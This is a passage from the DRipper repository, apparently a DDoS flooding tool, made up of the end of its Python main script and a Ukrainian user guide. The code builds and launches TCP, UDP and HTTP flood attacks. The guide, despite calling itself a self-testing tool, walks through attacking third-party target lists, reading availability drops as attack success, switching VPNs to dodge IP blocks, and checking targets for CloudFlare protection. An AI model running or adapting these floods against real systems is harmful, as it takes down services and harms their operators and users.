events_journal.error(NO_MORE_PROXIES_ERR_MSG) 110 | _ctx.logger.log(NO_MORE_PROXIES_ERR_MSG) 111 | exit(1) 112 | 113 | 114 | ############################################### 115 | # Target+Context 116 | ############################################### 117 | def connect_host(target: Target, _ctx: Context, proxy: Proxy = None): 118 | """Check connection to Host before start script.""" 119 | target.stats.connect.set_state_in_progress() 120 | try: 121 | with _ctx.sock_manager.create_tcp_socket(proxy) as http_socket: 122 | http_socket.connect(target.hostip_port_tuple()) 123 | except Exception as e: 124 | if target.scheme == 'udp': 125 | with _ctx.sock_manager.create_udp_socket() as udp_socket: 126 | send_bytes = generate_random_bytes(1, 100) 127 | udp_socket.sendto(send_bytes, target.hostip_port_tuple()) 128 | udp_socket.recvfrom(100) 129 | else: 130 | raise e 131 | finally: 132 | target.stats.connect.set_state_is_connected() 133 | 134 | 135 | def connect_host_loop(target: Target, _ctx: Context, retry_cnt: int = CONNECT_TO_HOST_MAX_RETRY) -> bool: 136 | """Tries to connect host in permanent loop.""" 137 | i = 0 138 | (host_ip, port) = target.hostip_port_tuple() 139 | if not host_ip: 140 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target.uri} Target\'s host ip wasn\'t detected...') 141 | return False 142 | 143 | target_uri_extended = f'{target.uri} ({host_ip}:{port})' 144 | while i < retry_cnt and not target.stats.connect.is_connected: 145 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} Trying to connect...') 146 | try: 147 | 
connect_host(target=target, _ctx=_ctx) 148 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} [green]Connected[/]') 149 | return True 150 | except Exception as e: 151 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} [red]{e}[/]') 152 | i += 1 153 | return False 154 | 155 | 156 | ############################################### 157 | # Console 158 | ############################################### 159 | def generate_valid_commands(uri): 160 | tcp_uri = http_uri = udp_uri = '' 161 | for t in uri: 162 | hostname = t.split(':') 163 | port = f':{hostname[2]}' if len(hostname) == 3 else '' 164 | udp_uri += f' -s udp:{hostname[1]}{port}' 165 | tcp_uri += f' -s tcp:{hostname[1]}{port}' 166 | http_uri += f' -s http:{hostname[1]}{port}' 167 | 168 | tcp_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} {tcp_uri}' 169 | udp_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} {udp_uri}' 170 | http_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} -e {ARGS_DEFAULT_HTTP_ATTACK_METHOD}{http_uri}' 171 | 172 | res = '' 173 | for a in ['tcp-flood', 'udp-flood', 'http-flood']: 174 | if a == 'tcp-flood': 175 | attack_args = tcp_attack 176 | elif a == 'udp-flood': 177 | attack_args = udp_attack 178 | else: 179 | attack_args = http_attack 180 | 181 | res += '[green]{attack} attack:[/]\n'.format(attack=a.upper()) 182 | for c in ['dripper', 'python DRipper.py', 'python3 DRipper.py', f'docker run -it --rm alexmon1989/dripper:{__version__}']: 183 | res += '{command} {attack_args}\n'.format(command=c, attack_args=attack_args) 184 | if c.startswith('dripper') or c.startswith('python3'): 185 | res += '\n' 186 | res += '\n' 187 | Console().print(res, new_line_start=True) 188 | 189 | 190 | def validate_input(args) -> bool: 191 | """Validates input params.""" 192 | # Do not validate targets if reads targets from file or remote location 193 | if args.targets_list is None: 194 | for target_uri in args.targets: 195 | if not Target.validate_format(target_uri): 196 | common.print_panel( 197 | f'Wrong target format in [yellow]{target_uri}[/]. Check param -s (--targets) {args.targets}\n' 198 | f'Target should be in next format: ' + '{scheme}://{hostname}[:{port}][{path}]\n\n' + 199 | f'Possible target format may be:\n' 200 | f'[yellow]tcp://{target_uri}, udp://{target_uri}, http://{target_uri}, https://{target_uri}[/]' 201 | ) 202 | return False 203 | 204 | if args.threads_count != 'auto' and (not str(args.threads_count).isdigit() or int(args.threads_count) < 1): 205 | common.print_panel(f'Wrong threads count. Check param [yellow]-t (--threads) {args.threads_count}[/]') 206 | generate_valid_commands(args.targets) 207 | return False 208 | 209 | if args.attack_method is not None and args.attack_method.lower() not in attack_method_labels: 210 | common.print_panel( 211 | f'Wrong attack type. Check param [yellow]-m (--method) {args.attack_method}[/]\n' 212 | f'Possible options: {", ".join(attack_method_labels)}') 213 | generate_valid_commands(args.targets) 214 | return False 215 | 216 | if args.http_method and args.http_method.lower() not in ('get', 'post', 'head', 'put', 'delete', 'trace', 'connect', 'options', 'patch'): 217 | common.print_panel( 218 | f'Wrong HTTP method type. 
Check param [yellow]-e (--http-method) {args.http_method}[/]\n' 219 | f'Possible options: get, post, head, put, delete, trace, connect, options, patch.') 220 | generate_valid_commands(args.targets) 221 | return False 222 | 223 | if args.proxy_type and args.proxy_type.lower() not in ('http', 'socks5', 'socks4'): 224 | common.print_panel( 225 | f'Wrong Proxy type. Check param [yellow]-k (--proxy-type) {args.proxy_type}[/]\n' 226 | f'Possible options: http, socks5, socks4.') 227 | generate_valid_commands(args.targets) 228 | return False 229 | 230 | return True 231 | 232 | 233 | def render_statistics(_ctx: Context) -> None: 234 | """Show DRipper runtime statistics.""" 235 | console = Console(width=MIN_SCREEN_WIDTH) 236 | 237 | update_available = '' 238 | if _ctx.latest_version is not None and _ctx.current_version < _ctx.latest_version: 239 | update_available = f'\n[u green reverse link={GITHUB_URL}/releases] Newer version {_ctx.latest_version.version} is available! [/]' 240 | 241 | logo = Panel(LOGO_COLOR + update_available, box=box.SIMPLE) 242 | console.print(logo, justify='center') 243 | 244 | with Live(_ctx.stats.build_stats(), vertical_overflow='visible', refresh_per_second=2) as live: 245 | live.start() 246 | while True: 247 | refresh_context_details(_ctx) 248 | live.update(_ctx.stats.build_stats()) 249 | # time.sleep(0.2) 250 | if _ctx.dry_run: 251 | break 252 | 253 | 254 | def main(): 255 | """The main function to run the script from the command line.""" 256 | console = Console(width=MIN_SCREEN_WIDTH) 257 | console.rule(f'[bold]Starting DRipper {VERSION}') 258 | 259 | args = arg_parser.create_parser().parse_args() 260 | 261 | if len(sys.argv) < 2 or not validate_input(args[0]): 262 | exit("\nRun 'dripper -h' for help.") 263 | 264 | # Init Events Log 265 | # TODO events journal should not be a singleton as it depends on args. Move it under the context! 266 | events_journal.set_log_size(getattr(args[0], 'log_size', DEFAULT_LOG_SIZE)) 267 | events_journal.set_max_event_level(getattr(args[0], 'event_level', DEFAULT_LOG_LEVEL)) 268 | 269 | _ctx = Context(args[0]) 270 | # go_home(_ctx) 271 | 272 | _ctx.logger.log('Check for DRipper Updates...') 273 | guc = GithubUpdatesChecker() 274 | _ctx.latest_version = guc.fetch_latest_version() 275 | _ctx.logger.log(f'Latest version is: {_ctx.latest_version.version}') 276 | 277 | # _ctx.logger.rule('[bold]Check connection with targets') 278 | # for target in _ctx.targets_manager.targets[:]: 279 | # # Proxies should be validated during the runtime 280 | # retry_cnt = 1 if _ctx.proxy_manager.proxy_list_initial_len > 0 or target.attack_method == 'udp' else 3 281 | # # TODO Make it concurrent for each target 282 | # if not connect_host_loop(_ctx=_ctx, target=target, retry_cnt=retry_cnt): 283 | # _ctx.targets_manager.delete_target(target) 284 | # _ctx.logger.rule() 285 | 286 | if len(_ctx.targets_manager.targets) == 0: 287 | _ctx.logger.log('All targets looks dead. 
Unable to connect to targets.\nPlease select another targets to run DRipper') 288 | exit(1) 289 | 290 | _ctx.validate() 291 | 292 | # Start Threads 293 | time.sleep(.5) 294 | _ctx.targets_manager.allocate_attacks() 295 | _ctx.duration_manager.start_countdown() 296 | 297 | render_statistics(_ctx) 298 | 299 | 300 | def signal_handler(signum, frame): 301 | """Signal handler for gracefully shutdown threads by keyboard interrupting.""" 302 | exit_event.set() 303 | raise KeyboardInterrupt 304 | 305 | 306 | def cli(): 307 | try: 308 | signal.signal(signal.SIGINT, signal_handler) 309 | sys.exit(main()) 310 | except KeyboardInterrupt: # The user hit Control-C 311 | sys.stderr.write('\n\nReceived keyboard interrupt, terminating.\n\n') 312 | sys.stderr.flush() 313 | # Control-C is fatal error signal 2, for more see 314 | # https://tldp.org/LDP/abs/html/exitcodes.html 315 | sys.exit(128 + signal.SIGINT) 316 | except RuntimeError as exc: 317 | sys.stderr.write(f'\n{exc}\n\n') 318 | sys.stderr.flush() 319 | sys.exit(1) 320 | 321 | 322 | if __name__ == '__main__': 323 | cli() 324 | -------------------------------------------------------------------------------- /docs/UserGuide.md: -------------------------------------------------------------------------------- 1 | # DRipper інструкція користувача 2 | 3 | **DRipper** - скорочено від DDoS Ripper. За основу DRipper спочатку було взято скрипт DDoS Ripper, 4 | який було оптимізовано, а потім повністю переписано для того, щоб досягти максимальної ефективності та інформативності. 5 | Розробники скрипта DRipper – це українці! 6 | 7 | **DRipper** - це скрипт для тестування власних сервісів користувача на рівень стійкості до DDoS атак. 8 | Користувач має змогу оцінити (протестувати) свої власні сервіси на рівень стійкості (захисту) від DDoS атак. 9 | На основі результатів тесту і логів DRipper користувач має змогу покращити захист своїх власних сервісів. 10 | 11 | ![DRipper interface](./images/dripper_interface.jpg) 12 | 13 | --- 14 | 15 | ## Основні властивості DRipper 16 | 17 | #### Одночасна робота скрипта по багатьох цілям. 18 | Скрипт може одночасно атакувати різні цілі різними методами. Підтримуються методи **tcp/udp/http flood**. 19 | Для цього потрібно лише передати набір цілей у форматі `{scheme}://{hostname}[:{port}][{path}]`. 20 | 21 | > Наприклад: tcp://site1.com:80, або udp://site2.com:53, або http://site3.com:80, або https://site4.com:443 22 | 23 | #### Автоматична перевірка нових версій DRipper. 24 | 25 | Як тільки з'являється нова версія DRipper, скрипт про це повідомить. 
Функція перевірки оновлення доступна, починаючи з версії **2.5.0** 26 | 27 | #### Детальна статистика по кожній цілі 28 | 29 | По кожній цілі ведеться окрема статистика, яка показує: 30 | 31 | - Код країни та IP адреса сервера 32 | - Поточний метод атаки 33 | - Кількість потоків, які працюють по цій конкретній цілі (в режимі роботи по багатьох цілям потоки розподіляються по цілях рівномірно при старті скрипта) 34 | - Інформація про те, чи знаходиться сервер під захистом CloudFlare від DDoS атак 35 | - Інформація від **check-host.net** сервіса по доступності цілі 36 | - Інформація по кількості відправлених даних і середньої швидкості даних 37 | - Інформація по кількості відправлених пакетів і середньої швидкості пакетів з даними 38 | - Інформація по успішному/неуспішному з'єднанню з сервісом 39 | - Розподілена статистика по кодам відповіді сервіса (для http атак) 40 | - Детальний журнал подій по всім цілям і процесам 41 | 42 | ``` 43 | Country, Host IP -- 127.0.0.1:8070 (target-0) 44 | Attack Method UDP-FLOOD 45 | Threads 200 46 | CloudFlare Protection Not protected 47 | Availability (check-host.net) Your IP was blocked with anti-bot or anti DDoS 48 | Check status - CTRL+click on link 49 | Sent Bytes @ AVG speed 189.98 MB @ 1.20 MB/s 50 | Sent Packets @ AVG speed 388,334 @ 2453 packets/s 51 | Connections success: 200, failed: 0, success rate: 100 % 52 | ───────────────────────────────────────────────────────────────────────────────────────────── 53 | 54 | Events Log 55 | ───────────────────────────────────────────────────────────────────────────────────────────── 56 | [11:54:59] info target-0 thread-195 Creating new UDP connection... 57 | [11:54:59] info target-0 thread-193 Creating new UDP connection... 58 | [11:54:59] info target-0 thread-199 Creating new UDP connection... 59 | [11:55:00] info target-0 thread-197 Creating new UDP connection... 60 | [11:55:00] info target-0 thread-198 Creating new UDP connection... 61 | ``` 62 | 63 | #### Перевірка доступності цілі за допомогою зовнішнього сервісу (check-host.net) 64 | 65 | Для кожної цілі автоматично через певний проміжок часу виконується запит на перевірку доступності цілі за допомогою 66 | зовнішнього сервісу. Така перевірка в автоматичному режимі допомагає зрозуміти, чи ціль ще жива та відповідає, чи вже ні. 67 | 68 | **check-host** сервіс може обмежувати доступ до свого ресурсу за допомогою CloudFlare anti-bot 69 | і перевірка скриптом в автоматичному режимі може не працювати. 70 | **DRipper** автоматично визначає такий захист і не намагається більше виконувати 71 | перевірку для того, щоб не отримати BAN і Вашу ІР не заблокували повністю. 72 | В такому випадку замість результатів перевірки з'являється повідомлення з прямим посиланням (hyperlink) для переходу 73 | на сторінку перевірки за допомогою браузера. 74 | 75 | #### Перевірка цілей на захист від DDoS від CloudFlare 76 | 77 | Кожна ціль перевіряється на захист від DDoS за допомогою CloudFlare. Оскільки атака на сервіс, який знаходиться 78 | за CloudFlare anti DDoS не буде ефективною, то перевірка на початку атаки повідомить Вам про це і дасть змогу приймати рішення щодо подальших дій. 79 | 80 | Також **DRipper** для атаки **http-flood** аналізує відповіді та помилки від сервера, серед яких, 81 | якщо будуть ознаки Rate limit (обмеження на кількість запитів за одиницю часу), 82 | anti-DDoS - скрипт повідомить про це і вчасно зупинить атаку для того, щоб запобігти блокуванню вашої публічної ІР адреси. 
83 | 
84 | #### Rate limit detection
85 | 
86 | In the background, the script automatically checks whether the target is reachable from your public IP specifically, so
87 | that blocks and restrictions that may appear during the attack are spotted quickly.
88 | One such restriction is a limit on the number of requests allowed from a single IP address.
89 | If the service has such mechanisms, **DRipper** reports it in the **Events log**, so you can decide
90 | on further actions, because such an attack is no longer effective.
91 | 
92 | #### Automatic VPN connection check
93 | 
94 | While the script is running, your external IP address is checked periodically; if the IP has changed since the script was started, **DRipper** will report it. A sketch of this idea is shown below.
95 | 
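One possible way such a check could work is sketched here. The IP echo service (api.ipify.org) and the polling interval are illustrative assumptions only; they are not taken from DRipper's source:

```python
# Illustrative only: warn when the public IP changes compared to the one
# seen at start-up. Not DRipper's actual VPN check.
import time

import requests


def get_public_ip() -> str:
    """Ask an IP echo service for the current public IP address."""
    return requests.get('https://api.ipify.org', timeout=10).text.strip()


def watch_public_ip(interval_sec: int = 60) -> None:
    """Poll the public IP and print a warning as soon as it differs from the initial one."""
    start_ip = get_public_ip()
    while True:
        time.sleep(interval_sec)
        if get_public_ip() != start_ip:
            print('WARNING: your public IP address has changed since the script was started!')
```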
96 | #### Command generator for when the user gets the command arguments wrong
97 | 
98 | Starting with script version **2.5.0**, if the user makes a mistake in the command, then in addition to the error message
99 | a list of ready-made commands for every attack type is printed, from which you can pick a command and run the script.
100 | 
101 | ```
102 | python3 DRipper.py -t 200 --log-level info -s udp://localhost:8070 -m tcp
103 | ╭─────────────────────────────────────────────────────────────────╮
104 | │ Wrong attack type. Check param -m (--method) tcp                │
105 | │ Possible options: udp-flood, tcp-flood, http-flood, http-bypass │
106 | ╰─────────────────────────────────────────────────────────────────╯
107 | TCP-FLOOD attack:
108 | dripper -t 100 -r 1 -l 1024 -s tcp://localhost:8070
109 | 
110 | python DRipper.py -t 100 -r 1 -l 1024 -s tcp://localhost:8070
111 | python3 DRipper.py -t 100 -r 1 -l 1024 -s tcp://localhost:8070
112 | 
113 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -r 1 -l 1024 -s tcp://localhost:8070
114 | 
115 | UDP-FLOOD attack:
116 | dripper -t 100 -r 1 -l 1024 -s udp://localhost:8070
117 | 
118 | python DRipper.py -t 100 -r 1 -l 1024 -s udp://localhost:8070
119 | python3 DRipper.py -t 100 -r 1 -l 1024 -s udp://localhost:8070
120 | 
121 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -r 1 -l 1024 -s udp://localhost:8070
122 | 
123 | HTTP-FLOOD attack:
124 | dripper -t 100 -e GET -s http://localhost:8070
125 | 
126 | python DRipper.py -t 100 -e GET -s http://localhost:8070
127 | python3 DRipper.py -t 100 -e GET -s http://localhost:8070
128 | 
129 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -e GET -s http://localhost:8070
130 | ```
131 | 
132 | ---
133 | 
134 | ## DRipper commands
135 | 
136 | Attacking a target requires only minimal basic knowledge of web technologies.
137 | 
138 | The script runs on Linux, macOS and Windows. To run it you need **Python** >= 3.9 or Docker.
139 | 
140 | Let's walk through an example of how to build a launch command when you have a list of targets at hand.
141 | 
142 | ```bash
143 | # Example target list:
144 | 
145 | https://site1.tv
146 | 111.22.33.444 (80/tcp, 443/tcp, 53/udp)
147 | 
148 | https://www.site2.ru
149 | 222.33.444.555 (25/tcp, 80/tcp, 443/tcp)
150 | 333.33.555.678 (25/tcp, 80/tcp, 443/tcp)
151 | 
152 | http://www.site3.com
153 | ```
154 | 
155 | Based on the list above, we can build commands for different attack types.
156 | For example, for `https://site1.tv` and `https://www.site2.ru` the IP addresses and ports are known,
157 | so it is very easy to build an attack command for them. For `http://www.site3.com` there is no additional information,
158 | so for that resource we will create all possible variants.
159 | 
160 | ```bash
161 | # Example attacks based on the target list:
162 | 
163 | # Target 1
164 | # https://site1.tv
165 | # 111.22.33.444 (80/tcp, 443/tcp, 53/udp)
166 | 
167 | # Attack 1
168 | python3 DRipper.py -t 300 \
169 |   -s tcp://111.22.33.444:80 \
170 |   -s tcp://111.22.33.444:443 \
171 |   -s udp://111.22.33.444:53
172 | ```
173 | 
174 | To attack the third entry, you can use just the site name and put the attack method in front of it.
175 | Of course, you should understand that such an attack will most likely not be effective, because it is unknown which ports are open to the outside, what protection the site has, and so on.
176 | 
177 | ```bash
178 | # Target 3
179 | # http://www.site3.com
180 | 
181 | # Attack 3
182 | python3 DRipper.py -t 300 \
183 |   -s tcp://www.site3.com \
184 |   -s udp://www.site3.com \
185 |   -s http://www.site3.com
186 | ```
187 | 
188 | ---
189 | 
190 | ## DRipper statistics
191 | 
192 | Let's look at the results of an **http-flood** attack against a single target and figure out what exactly the statistics show.
193 | 
194 | ```bash
195 | ──────────────────────────────────────────────────────────────────────────────────────────────────
196 | Description                   Status
197 | ──────────────────────────────────────────────────────────────────────────────────────────────────
198 | Start Time, Duration          2022-04-10 17:11:56 (0:00:52)
199 | Your Country, Public IP       NL 89.***.***.***
200 | vCPU Count                    8
201 | Socket Timeout (seconds)      60
202 | Random Packet Length          True | Max length: 1024
203 | ──────────────────────────────────────────────────────────────────────────────────────────────────
204 | Country, Host IP              RU 91.222.33.444:443 (target-0)
205 | HTTP Request                  GET: https://www.site1.ru:443/
206 | Attack Method                 HTTP-FLOOD
207 | Threads                       200
208 | CloudFlare Protection         Not protected
209 | Availability (check-host.net) [17:12:12] Accessible in 19 of 21 zones (90%)
210 | Sent Bytes @ AVG speed        33.21 MB @ 646.59 kB/s
211 | Sent Packets @ AVG speed      77,187 @ 1467 packets/s
212 | Connections                   success: 180, failed: 120, success rate: 60 %
213 | ──────────────────────────────────────────────────────────────────────────────────────────────────
214 | Status Code Distribution      200: 100%
215 | ──────────────────────────────────────────────────────────────────────────────────────────────────
216 | 
217 | Events Log
218 | ──────────────────────────────────────────────────────────────────────────────────────────────────
219 | [17:12:49] info target-0 thread-7 Creating HTTP connection...
220 | [17:12:49] error target-0 thread-197 BrokenPipeError: [Errno 32] Broken pipe
221 | [17:12:49] error target-0 thread-9 BrokenPipeError: [Errno 32] Broken pipe
222 | [17:12:49] info target-0 thread-9 Creating HTTP connection...
223 | [17:12:49] info target-0 thread-197 Creating HTTP connection...
224 | ```
225 | 
226 | - **Country, Host IP**
227 | 
228 | Here you see the country code `RU` and the target's IP address `91.222.33.444:443`. There is also the target identifier `(target-0)`, which
229 | tells you which events in the **Events log** relate to this target.
230 | 
231 | - **HTTP Request**
232 | 
233 | The HTTP method and the address the script sends packets (requests) to. For tcp-flood and udp-flood attacks this entry is not shown in the statistics.
234 | 
235 | - **Attack Method**
236 | 
237 | The name of the attack method, for example: TCP-FLOOD, UDP-FLOOD, HTTP-FLOOD.
238 | 
239 | - **Threads**
240 | 
241 | The number of threads the attack is run from. Threads are distributed evenly between the targets when the script starts (see the sketch below).
242 | Keep in mind that the number of threads and how effectively they are used depend on the power of your machine.
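A purely illustrative sketch of such an even split follows; the function below is hypothetical and is not the actual `targets_manager` API:

```python
# Hypothetical helper: split the total number of attack threads evenly across
# targets, spreading any remainder one by one. Not DRipper's actual code.
def distribute_threads(total_threads: int, targets: list[str]) -> dict[str, int]:
    base, remainder = divmod(total_threads, len(targets))
    return {
        target: base + (1 if index < remainder else 0)
        for index, target in enumerate(targets)
    }


print(distribute_threads(200, ['tcp://site1.com:80', 'udp://site1.com:53', 'http://site3.com']))
# {'tcp://site1.com:80': 67, 'udp://site1.com:53': 67, 'http://site3.com': 66}
```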
243 | 
244 | - **CloudFlare Protection**
245 | 
246 | Whether the site is protected by CloudFlare (Not protected - no protection, Protected - protection is in place).
247 | > If protection is detected, the attack is stopped automatically so that your IP address does not end up
248 | > on that site's IP blacklist. Besides, an attack on a protected site is highly ineffective.
249 | 
250 | Without going too deep into the details, CloudFlare protection works roughly as follows.
251 | In front of a site page (for example, the site's home page) CloudFlare inserts its own page containing a script
252 | that, for about 5 seconds, analyses the number of requests coming from your public IP address and at the same time generates a mathematical
253 | challenge that your browser has to solve within those 5 seconds. When a user opens
254 | a page with such protection, they see a message saying their browser is being checked and they should wait roughly 5 seconds.
255 | After that the user is redirected to the page they requested. It sounds simple... the logical thing would seem to be to just wait 5 seconds before the attack
256 | and only then attack such a resource. But it is not that simple.
257 | 
258 | For a DDoS script it is not particularly hard to recognise that a page or site has this kind of protection. The main problem is
259 | that you need to fetch the page's JavaScript code, analyse the parts of the challenge in that code
260 | (and CloudFlare constantly changes those code fragments and their number), then solve the challenge and obtain the checksum.
261 | The computed result has to be passed along with the next DDoS request, written in the format (identifier - result)
262 | that CloudFlare defined for this page. If the challenge is solved, CloudFlare forwards all requests to the target resource.
263 | But if the challenge is not solved, or is solved incorrectly, access to the resource is blocked. And that is still not all.
264 | A few minutes later there is another, different check: the number of requests sent is verified,
265 | and if it exceeds the allowed amount, the whole verification starts again from the beginning.
266 | 
267 | That is exactly why attacking resources behind CloudFlare is not effective: during the attack you have to keep solving challenges
268 | to bypass the protection, wait 5 seconds for each check, and then pause so as not to exceed the request limits.
269 | On top of that, developer time is constantly needed to keep improving the bypass mechanisms.
270 | Popular libraries for bypassing this kind of protection simply cannot keep up with the changes CloudFlare
271 | keeps making to its protection algorithms.
272 | 
273 | - **Availability (check-host.net)**
274 | 
275 | Information about the site's availability. Servers located in a variety of regions are used for the check.
276 | At the time of writing, 21 regions are available (Australia - Perth, Austria - Salzburg, Canada - Toronto,
277 | France - Paris, Germany - Frankfurt, Hong Kong - Hong Kong, Iran - Tehran, Italy - Milan, Kazakhstan - Karaganda,
278 | Lithuania - Vilnius, Moldova - Chisinau, Netherlands - Amsterdam, Portugal - Viana, Russia - Moscow, Russia - Moscow,
279 | Switzerland - Zurich, Turkey - Istanbul, Ukraine - Khmelnytskyi, Ukraine - Kyiv, USA - Los Angeles, USA - New Jersey).
280 | 
281 | `[17:12:12]` - the time of the last check.
282 | 
283 | `Accessible in 19 of 21 zones (90%)` - the site is reachable from 19 of the 21 zones (check regions); 90% is the overall availability percentage.
284 | When the percentage drops below 50%, it means the site is barely working any more, which in turn shows that the attack is effective.
285 | 
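For reference, the percentage is simply the share of zones that report the target as reachable, rounded to a whole number; the tiny helper below is purely illustrative and is not DRipper's code:

```python
# Illustrative only: derive the availability line from per-zone check results.
def availability_line(reachable_zones: int, total_zones: int) -> str:
    percent = round(reachable_zones / total_zones * 100)
    return f'Accessible in {reachable_zones} of {total_zones} zones ({percent}%)'


print(availability_line(19, 21))  # Accessible in 19 of 21 zones (90%)
```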
286 | If the **check-host.net** site itself is protected by CloudFlare anti-bot, the script detects that protection
287 | and stops sending the periodic availability requests, so that your IP address does not get blocked by the service.
288 | In that case **DRipper** reports it and provides a link for checking the target's availability in your browser.
289 | 
290 | To open the availability check page, hold **CTRL** and click the *link*.
291 | 
292 | ```bash
293 | Availability (check-host.net) Your IP was blocked with anti-bot or anti DDoS
294 |                               Check status - CTRL+click on link
295 | ```
296 | 
297 | - **Sent Bytes @ AVG speed**
298 | 
299 | Statistics on the amount of data sent. `33.21 MB @ 646.59 kB/s` means
300 | that a total of 33.21 MB was sent at an average speed of 646.59 kB/s.
301 | 
302 | During an attack, watch the total amount of data sent: it should keep growing.
303 | If this figure does not increase, it means the data is not reaching the server.
304 | The speed figure shows the average data transfer rate over the whole run.
305 | When no data is being transferred, the average speed drops; when data is flowing, the figure either grows
306 | or fluctuates slightly around its current value.
307 | 
308 | - **Sent Packets @ AVG speed**
309 | 
310 | Statistics on the number of data packets transferred. `77,187 @ 1467 packets/s` means that a total of
311 | 77,187 packets (or requests) were sent at an average rate of 1467 packets/s (for http-flood the unit is requests/s).
312 | Read the packet count and packet rate the same way as described for *Sent Bytes @ AVG speed*.
313 | 
314 | - **Connections**
315 | 
316 | Connection statistics. `success: 180` says that 180 successful connections to the server were established
317 | for sending data while the script was running. `failed: 120` is the number of connections that failed with an error or
318 | were dropped. `success rate: 60 %` is the share of successful connections among all connection attempts, expressed as a percentage (a worked example follows below).
319 | 
320 | If the number of failed connections grows very quickly, or is almost equal to the number of successful ones, this may indicate,
321 | for example, problems with your VPN. In that case it is worth considering switching the VPN connection and restarting the attack.
322 | 
323 | There will always be some failed connections, because errors simply cannot be avoided when sending the large amounts of packets
324 | and data that are typical of DDoS attacks. So keep in mind that what matters is the dynamics of what is happening,
325 | not the absolute values. The basic rule for connections is that successful connections should keep increasing right after
326 | failed ones appear - this shows that a new connection is being made and the script keeps attacking.
327 | 
328 | Success rate should also be treated as a rough indicator: it can be 100% or it can be 50%, and both are normal values
329 | that simply show how good the connection is. If there were no connection problems at all during the whole run, the
330 | **Success rate** will be 100%, which is simply the ideal case. But even if there were 10 failed connections, the script makes an 11th, successful one and keeps
331 | working - the **Success rate** will be about 52%, which is also a good result. It is just that, compared to an ideal connection, this case with connection
332 | errors looks that way from a mathematical point of view.
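As a worked example of the numbers above (the helper is illustrative, not DRipper's statistics code): 180 successful connections out of 180 + 120 attempts gives 60 %, and 11 successful out of 11 + 10 gives roughly 52 %.

```python
# Illustrative only: success rate as the share of successful connections
# among all connection attempts.
def success_rate(success: int, failed: int) -> int:
    total = success + failed
    return round(success / total * 100) if total else 100


print(success_rate(180, 120))  # 60 -> shown as "success rate: 60 %"
print(success_rate(11, 10))    # 52 -> the 10-failed-connections example above
```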
333 | 
334 | - **Status Code Distribution**
335 | 
336 | The distribution of the server's response status codes. What status codes are and what each one means
337 | is described in more detail on [Wikipedia](https://uk.wikipedia.org/wiki/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_%D0%BA%D0%BE%D0%B4%D1%96%D0%B2_%D1%81%D1%82%D0%B0%D0%BD%D1%83_HTTP).
338 | `200: 100%` indicates that all requests received by the server were processed, i.e. the HTTP requests completed successfully.
339 | 
340 | DRipper does not collect statistics for every single request, since that would hurt the attack's efficiency. Instead, the script periodically
341 | inspects one of the responses (roughly once every 10 seconds) and builds the statistics from it.
342 | 
343 | - **Events log**
344 | 
345 | The events log, which shows the details of what is happening with all the targets.
346 | It contains a lot of low-level information that can be useful to those familiar with the inner workings of the TCP/UDP protocols.
347 | 
348 | Besides protocol details, it also contains useful information about errors that may occur during the attack.
349 | For example, your IP address may be blocked manually during the attack, and there is no way you can predict that.
350 | If that happens, the events log reports it as an error with details about
351 | which thread it happened in and which target it relates to.
352 | 
353 | In the example below there are two messages, one with the `info` level and one with the `error` level.
354 | The `info` level produces many messages describing what the attack processes are doing.
355 | By default this level is not enabled - only the `warn` and `error` levels are shown in the events log.
356 | 
357 | ```bash
358 | [17:12:49] info target-0 thread-7 Creating HTTP connection...
359 | [17:12:49] error target-0 thread-197 BrokenPipeError: [Errno 32] Broken pipe
360 | ```
361 | 
362 | The `warn` level warns the user about events that affect the attack's effectiveness or relate to
363 | your privacy (VPN status, etc.), for example rate limits (when the server caps the number of requests), IP blocks and so on.
364 | 
365 | The `error` level reports errors that occurred during the attack. Most errors are handled, and the error messages
366 | are informative enough to help you understand what exactly went wrong.
367 | 
368 | For example, `timeout error`: when many errors of this type appear, it means the server may be overloaded
369 | and cannot respond within the given time. An error like this can therefore serve as a hint
370 | to increase the script's `timeout` by adding the `-o 30` or `-o 60` parameter
371 | (a timeout of 30 or 60 seconds, respectively) to the launch command.
372 | 
373 | There may also be many errors such as `BrokenPipeError`. They occur when a large number of requests is sent,
374 | but the script recognises them and simply closes the old connection and opens a new one, so the attack thread keeps running (see the sketch at the end of this guide).
375 | 
376 | The number of lines shown at once in the **Events log** can be set by the user with the
377 | `--log-size=N` parameter, where N is the number of lines.
378 | 
379 | The message level of the **Events log** can be set with the `--log-level=info` parameter,
380 | where `info` is the lowest message level and `warn` and `error` are the next levels in order of importance.
381 | You can also disable the events log entirely with the `--log-level=none` parameter.
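Finally, to illustrate the close-and-reopen behaviour mentioned above for `BrokenPipeError`: the snippet below shows only the generic pattern; the function and the socket details are illustrative assumptions, not DRipper's actual attack code.

```python
# Generic illustration of "close the broken connection and continue with a new one".
import socket


def send_with_reconnect(sock: socket.socket, address: tuple[str, int], payload: bytes) -> socket.socket:
    """Send payload; if the peer dropped the connection, reconnect and retry once."""
    try:
        sock.sendall(payload)
    except (BrokenPipeError, ConnectionResetError):
        # The peer closed the connection: discard the old socket and open a fresh one.
        sock.close()
        sock = socket.create_connection(address, timeout=60)
        sock.sendall(payload)
    return sock
```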
382 | 
--------------------------------------------------------------------------------